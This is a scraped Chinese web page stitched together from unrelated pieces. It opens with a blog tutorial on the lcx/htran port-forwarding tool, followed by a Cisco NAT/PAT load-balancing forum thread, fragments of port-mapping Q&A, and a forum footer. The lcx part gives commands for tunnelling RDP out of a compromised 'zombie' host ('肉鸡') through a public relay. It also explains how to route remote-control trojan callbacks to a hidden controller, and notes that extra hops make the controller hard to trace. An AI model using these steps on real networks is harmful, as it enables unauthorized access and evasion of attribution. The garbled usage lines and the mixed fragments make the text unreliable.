lcx是一款强大的内网端口转发工具，用于将内网主机开放的内部端口映射到外网主机（有公网IP）任意端口。它是一款命令行工具，当然也可以在有权限的webshell下执行，正因如此lcx常被认为是一款黑客入侵工具，lcx在内网入侵渗透中起着重要的角色。lcx进行端口转发的原理就是使不同端口之间形成一个回路（如图1）。它常用于外网连接内网3389端口。
　　这个工具很早就已经有了，它的全名叫Socket data transport tool，简写做trtool，由红盟联盟的前辈bkbll所写，功能和lion写的htran 1.1版一样，不过是在linux下使用的而已。所谓的lcx.exe其实是lcx根据lion的代码所修改编译过的htran。现在已经有跨平台的了，支持在windows、linux下使用。还有一些根据lcx源码开发的其他版本，比如jsp版，http隧道版等等。
　　下面说一下它的使用以及功能说明：
Usage of Packet Transmit:
./lcx -&listen|tran|slave& &option& [&-log|-hex|-text& file]
./lcx -about
[options:]
-listen &local port1&
&local port2&
&local port&
&remote host&
&remote port&
&remote host1& &remote port1& &remote host2& &remote port2&
: hex mode data dump
: text mode data dump
: save transfer log
　　最常用功能：连接内网的3389
　　1. B主机（公网IP：20.30.40.50）:&lcx -listen
　　2222为转发端口，6666为B主机任意未被占用的端口
　　2. A肉鸡服务器：lcx.exe -slave 20.30.40.50 .0.1 3389
　　20.30.40.50为B主机的IP,2222为转发端口，127.0.0.1为A肉鸡内网IP，3389为远程终端端口
　　3. B主机连接A肉鸡3389时格式：mstsc 127.0.0.1:6666
　　　当然，其他主机（C主机，可以在内网中）连接A肉鸡服务器：mstsc 20.30.40.50:6666
　　至此，就可以通过lcx端口映射就可以直接连接内网服务器了。整个连接流程图大致如下：
　　上面的情况中多数是通过跳板主机B来连接肉鸡服务器的，也就是主机C通过连接处于公网中的服务器B来连接内网服务器A。上面的连接中，先是肉鸡服务器主动发起向外（主机B）的连接，所以这种情况，防火墙一般是不会拦截的。而且由于跳板机（主机B）只是监听本地端口，而控制者（主机C）可以在任意网络环境中，所以很难追踪到控制者的具体位置。如果再加上几个跳板就很难被查水表啦：）
　　逆向思维：端口转发实现远程控制
　　基于lcx强大的端口转发功能，可以通过端口转发实现将远程控制的服务端放置的任意网络环境中。　　
　　1. 配置客户端上线地址：21.23.10.8 端口：8083
　　2. 公网主机运行lcx：lcx -listen 123 8083
　　3. 控制端运行：lcx.exe -slave 21.23.10.8 123 127.0.0.1 789 &通知设置远控控制端的监听端口：789&&
　　可以看到，这用使用方式和上面的完全相反。控制端使用lcx主动连接公网中的转发主机，由于肉鸡上的客户端默认是配置主动连接的，所以只要转发通道是通畅的，客户端发起的连接都会由转发主机转发到控制端的机子上，而无论控制端是否有公网IP。所以说，关键的瓶颈就可以这用解决。又由于lcx已经支持跨平台，所以即使公网主机是Linux系统也可以实现只能在windows上跑的绝大多数远控软件。
　　　　关于lcx的使用就简单介绍到这里，之后将会对lcx源码做一个简单的分析，博客将持续更新。。。
阅读(...) 评论()712 条评论分享收藏感谢收起赞同 104 条评论分享收藏感谢收起写回答查看:24457|回复：15
初级工程师
如图中所示，R1和R2模拟成两台服务器并且提供相同的服务(地址分别为172.16.1.1 ，172.16.1.2)，R3是交换机，R4是边界路由器也就是内部服务器的网关所在路由器（内网口地址为172.16.1.254 ），R5充当公网并且有环回口5.5.5.5，在R4上的E0/0（地址为222.222.222.1） 接口开启PAT，使得内网服务器可以访问外网R5的 5.5.5.5
(17.37 KB)
(17.88 KB)
这时就进入关键性阶段了，1：写一条ACL来匹配公网路由，access-list 2 permit 222.222.222.1&&
& && && && && && && && && && && && && && &2：定义一个以内部服务器为地址的池：ip nat pool ccna 172.16.1.1 172.16.1.2 netmask& && && && && &&&255.255.255.0&&type rotary (最后这两个一定要有意思就是让这些地址轮循)
& && && && && && && && && && && && && && &3：将ACL跟地址池关连起来：ip nat inside destination (注意这个不是source) list 2 pool ccna
(24.55 KB)
最后就是在R1，R2的line vty 0 4 下打no login 允许外网的登陆。
这时可以检验结果了，，在R5上telnet 222.222.222.1 可以发现第一次时进入R1，第二次就进入R2了，
(17.51 KB)
这 样就达到了两个服务器的负载均衡了。。当然这种情况是在多个服务器提供相同的服务的前提下才好用。
但是对于内部有多台服务器要同时开放一个相同的端口但是又只有一个公网IP时该怎么办呢？
(23.89 KB)
图中标出了拓扑的详细结构，服务器地址分别为172.16.1.2 和172.16.1.3 ，网关为172.16.1.1 ，然后同样的跟上边一个实验一样，在边界路由器做基于接口的PAT转换，使得服务器可以访问公网，然后我们就开始在边界路由器上配置端口跟ip地址的映射，通常情况下我们都认为映射是这样写： ip nat inside source static tcp 172.16.1.2 80 222.222.222.1 80 然后会发现下一台服务器没法再做相同端口的映射了，，因此我们就必需改变上面的命令来使得另一台服务器也可以基于80端口的映射：这进命令就可以改成：ip nat inside source static tcp 172.16.1.2 80 222.222.222.1 100&&与
ip nat inside source static tcp 172.16.1.3 80 222.222.222.1 101 这样的两条映射。。那么这样写的映射是否真的可行呢？那就让我们一起来检验下成果，首先必需在两台服务器上面的HTTP上面写上一些内容以做为区分。。
(75.23 KB)
最后就是在最右边的PC上边打开WEB页面，输入地址：222.222.222.1：100 就会看到这个现象，，
(32.32 KB)
说明我们己经可以访问内部的一台服务器了。
然后再输入：222.222.222.1：101 可以看到有
(31.35 KB)
仔细看地址下面的字母两次登陆时结果是不一样的。。。这就说明我们可以利用这一个公网IP来映射多个内网的服务器了。。
这个是我对于第二个实验做的PT：
(31.31 KB)
(31.31 KB)
下载次数: 559
以上就是我的总结有 错误和不足之处望大家可以指出。。
本帖最后由 yahooocomcn 于
16:56 编辑
助理工程师
:(pdd_23):好厉害哇
大牛又发实验了啊？
中级工程师
上面那个内网server负载分担不错，这个用在多server提供相同的服务环境，当数据流到达pat设备的时候，因inside destination而改变成内网server的地址，但是我还是有点疑问：
1、你这个gateway设配置是pat，他采用的是ip+port来确认一个lan内的主机，比如你上面的telnet（23port），但是lan内别的主机要访问外网，他外网的数据流进来，因为你有inside destination都有可能会指向你的server吧？
2、pat只能允许tcp的流量经过设备，因为udp是将应用程序交给的东西加个udp的header直接让ip处理的，如果该数据报超过接口的mtu值，ip是会将其分片的，但是分片除了第一个片有4层头部，后面的都没有，pat是识别不了的，直接drop，内网的主机都不知道发过来是什么
淡泊明志宁静致远
初级工程师
引用:原帖由 拿贝马凡 于
09:50 发表
上面那个内网server负载分担不错，这个用在多server提供相同的服务环境，当数据流到达pat设备的时候，因inside destination而改变成内网server的地址，但是我还是有点疑问：
1、你这个gateway设配置是pat，他采用的是ip+port来确 ... 第一个问题你的意思是内网出去的数据，回来是时候触发了inside destination而导致发向错误的server吗？。。如果是这样的话我认为出去的数据包在在网关路由器那会形成一个映射表。。当数据回来时它会优先查找这个表。。查不到才会再去触发inside destination 。。。
第二个问题。。还是不大理解。。如果只是一个端口映射一个地址。。就不会出现mtu 的问题了？。。而且80端口号是基于TCP的吧。。对于你讲的UDP的还是有点不大懂。。
中级工程师
“第二个问题。。还是不大理解。。如果只是一个端口映射一个地址。。就不会出现mtu 的问题了？。。而且80端口号是基于TCP的吧。。对于你讲的UDP的还是有点不大懂。。”
不是，只要pat都会出现这类问题，这关系到一个分片以及重组装的问题，因为udp没有确认机制，当然除非你上层应用程序（QQ是个典型）有这个机制。比如说你传一个大的文件，你用tftp udp的端口（当然tcp 69也是tftp的），报文超过1500个字节，就需要分片了，而tcp是数据流，也可以说是segment，他把应用程序的教下来东西分成几段传输，而udp是直接交由ip处理。---而分层的特点就是每层做的动作对其他层都是透明的。
当ip将udp叫下来的报文分成几片，第一片都有udp的头部信息，而其他片却没有。报文到达目的地才会重组装，而片都不全，就需要source重传，而source都不知道这些，所以就无从谈起了。
而你说的第一个问题，我觉得最好是另外的ip进行处理，的确是先看nat转换表，但是有个nat快速转发与nat表的覆盖。当然这个只是我个人认为，你觉得呢？
积极参与讨论
淡泊明志宁静致远
初级工程师
引用:原帖由 拿贝马凡 于
11:38 发表
“第二个问题。。还是不大理解。。如果只是一个端口映射一个地址。。就不会出现mtu 的问题了？。。而且80端口号是基于TCP的吧。。对于你讲的UDP的还是有点不大懂。。”
不是，只要pat都会出现这类问题，这关系到一个分片以 ... 嗯。。第二个问题就是说当使用UDP的端口号时才会出现这种现象了。。。
当然对于PAT的映射表会存在边界路由器1分钟的时间，，正常情况下是不会出现问题的，，如果有多个公网的话当然建议用多个ip。。但是这种情况下对于一些中小型企业的配置来讲我觉得还是很合适的。。
积极参与讨论
中级工程师
你考虑到连接数没有？如果是server访问量大，port不够用是危险的事情，这个最好是静态做转换。lz的实验没有问题，但是生产上，要注意这些问题
淡泊明志宁静致远
初级工程师
引用:原帖由 拿贝马凡 于
12:25 发表
你考虑到连接数没有？如果是server访问量大，port不够用是危险的事情，这个最好是静态做转换。lz的实验没有问题，但是生产上，要注意这些问题 一个端口在一分钟内应该是可以承受65535个数据包。。。超过一分钟的包不会保留在路由器上，，就像我们做实验一样做了几个地址的PAT转换，但是多台主机去ping外网的时候全部都是只转换成第一个PAT地址，，那是因为在一分钟内达到65535个数据包它才会把地址转换成第二个地址，，除非碰上一些特别的中大型网络（特殊情况），，要不一个端口一般情况下是够用的。。
中级工程师
精品帖子，谢谢楼主。
支持！！！
太有经验了
多多学习！
助理工程师
楼主&&那个PT的实验&&好像不能让PC0&&访问HTTP服务器啊
而且为什么网管路由器的两个接口都是&&ip nat inside？
学习。没看懂。
路由器的端口映射和端口转发可以解决这个问题不？
初级工程师
写的不错，就是下载币要钱，可饿，资源无常共享嘛，学学红盟过客！
有点像端口转向来着..
请教下在R5同网段的PC浏览器上输入 222.222.222.1 能进172.16.1.1或者是172.16.1.2的http服务器，但是在pc浏览器上直接输入172.16.1.1或者是172.16.1.2是不是进不去该服务器呢（未做上述地址映射配置前直接输入服务器的IP地址是能上的，是不是做了映射之后就只能通过映射地址上，而服务器原IP地址就上不了呢）?怎么把服务器公网端口映射到本机电脑？能做到吗？
[问题点数：150分]
本版专家分：0
结帖率 50%
CSDN今日推荐
本版专家分：0
匿名用户不能发表回复！|
其他相关推荐
现在ip比较稀缺，如果要把家里的端口映射到外网，要通过花生壳内网版，而且不能指定外网的端口。nat123那个感觉也不好用，如果想让任意端口映射到外网。我的想法来源于花生壳的vpn和圣剑vpn的软件功能，在外网主机搭建vpn，其他内网主机连vpn，用iptables做端口转发到内网，实现任何端口映射，云主机的价格和那些圣剑，或者nat123，或者花生壳的价格都低了太多太多，而且更方便，更随意。
我们平常学习时经常会写一下javaweb程序，我们为了更能逼近现实，就想着自己的javaweb程序发布后，外网的同学能够访问我们的网站，难道我们去买空间，去买域名嘛，其实也没必要，我们只是学习，测试之用，在自己的电脑上搭建一个服务器完全可以满足要求。上次写的一篇博客，PC服务端与Android客户端实现网络通信，就是利用这个原理。
我们分为三步走来实现：(我这里用的示例javaweb程序是我自己
使用nat123软件在网站上添加域名，选择非网站应用。花一块钱。安装android版的nat123软件，登陆，开启服务。
添加端口映射将手机的内网IP 10.144.89.**和要映射的端口700填入，外网端口就是nat123服务器给你提供可以连接的端口38401。
然后打开cmd-ping你刚才的域名，获得一个ip114.****，就是这个域名，也即nat123服务器的ip，上一行有端口38
转载自：http://blog.csdn.net/sadshen/article/details/
这篇文章花了好几天，系统地梳理出了映射公网的几种方式。虽然是针对微信开发的外网服务器来寻找解决方案，但这个知识梳理可能会在其他地方也受益。平常我也有用TeamViewer，在搜集资料的过程中也知道了其大致工作原理。还有一些免费好用的反向代理软件，可能会在后头派上用场。
http://hi.baidu.com/good_boy_/item/3e08391cb5bed4436926bbd6
你要知道你要映射到公网的那个内网IP需要向外映射的端口是哪些。你不可能把所有端口都映射到公网上，否则别的机器根本就无法接收公网的回包了。
不知道你说的路由器是桌面型的宽带路由器还是数据通讯用的传统路由器。
如果是前者的话，把你的宽
有时候，我们处于一个局域网里，用着内网的ip，但是由于只有一个公网ip，所以内网中的web服务器或者vpn服务器都不能对外开放，我们可以通过路由器的宽口映射功能来把某些服务对外开放。
首先登陆你的路由器，具体的地址看路由器反面说明，我这边是192.168.1.
背景：有些朋友开发了一些不错的demo或者项目，想展示给别人看（尤其是学生演示项目），当直接把工程发给对方的话，如果对方不是开发人员，想要看到你的作品那就太不方便了。这个时候你可能想要是有一台自己的虚拟主机就好了。
解决方案：其实不需要这么麻烦，只需要将你自己的电脑部署成可供外网访问的服务器即可。而且操作相当容易。
于是乎，现在你的电脑中启动一下tomcat（当然也可以直接在eclip
什么是内网？通俗讲，如学校宿舍使用的校园网，公司办公使用的网络，自己随便拉的带宽，都是内网。也叫无公网IP，如192.168.1.8是内网IP地址。
什么是外网？全球可访问的域名或全球唯一的公网IP，叫外网地址。如百度地址www.baidu.com是外网地址。
因此我们做GPRS之类的通信实验时，需要将内网IP映射到公网域名上，如何映射呢？我们可以借助nat123这个软件（花生壳也可，
通常情况下，路由器都有防火墙功能，互联网用户只能访问到你的路由器WAN口(接ADSL的电话线口或路由宽带外网口)，而访问不到内部服务器。要想让互联网用户访问到你建的服务器，就要在路由器上做一个转发设置，也就是端口映射设置，让互联网用户发送的请求到达路由器后,再转发到你建立的服务器或WEB站点。这就是端口映射。由于各个路由器厂商所取功能名称不一样，有的叫虚拟服务器，有的叫NAT设置(B
自己电脑搭建了网站应用后，本地及内网局域网是可以正常访问的，如何发布到外网呢？不管网络环境如何复杂，只要电脑可以上网，说明电脑是有连网的，为打通内外网的连通性，可以在内网安装启用一个可以固定地址作用的软件，如域名解析绑定软件，如NAT123域名解析映射软件，可以将域名与内网应用进行绑定，这样，不管网络环境如何复杂，只要可以上网，就可以一步绑定域名发布网站应用到外网。具体实现过程：
一，确保本地及查看: 208|回复: 7
我用的路由器，如果不做端口映射，客户Duan是否可以远程连接服务器
阅读权限90
签到天数：13 天结帖率： (4/7)
我用的路由器，如果不做端口映射，客户Duan是否可以远程连接服务器
{:4_266:}{:4_266:}{:4_266:}{:4_266:}
{:4_266:}{:4_266:}{:4_266:}{:4_266:}& && && && && && && && && && && && && && && & {:4_266:}{:4_266:}{:4_266:}{:4_266:}
{:4_266:}{:4_266:}& && && && && && && && && && && && && && && && && && && && && && && &{:4_266:}{:4_266:}{:4_266:}{:4_266:}
{:4_266:}{:4_266:}{:4_266:}{:4_266:}& && && && && && && && && && && && && && && & {:4_266:}{:4_266:}{:4_266:}{:4_266:}
{:4_266:}{:4_266:}{:4_266:}{:4_266:}{:4_266:}{:4_266:}{:4_266:}{:4_266:}{:4_266:}{:4_266:}{:4_266:}{:4_266:}
你要是不知道路由器密码
也可以用路由侠 或者别的软件来做映射， 但是必须映射才能连接的
拒绝任何人以任何形式在本论坛发表与中华人民共和国法律相抵触的言论，本站内容均为会员发表，并不代表精易立场!
揭阳精易科技有限公司申明:我公司所有的培训课程版权归精易所有，任何人以任何方式翻录、盗版、破解本站培训课程，我们必将通过法律途径解决！
公司简介：揭阳市揭东区精易科技有限公司致力于易语言教学培训/易语言学习交流社区的建设与软件开发，多年来为中小企业编写过许许多多各式软件，并把多年积累的开发经验逐步录制成视频课程供学员学习，让学员全面系统化学习易语言编程，少走弯路，减少对相关技术的研究与摸索时间，从而加快了学习进度！
防范网络诈骗，远离网络犯罪
违法和不良信息举报电话，QQ： ，邮箱：@b.qq.com
Powered by
X3.2 揭阳市揭东区精易科技有限公司
粤公网安备 25}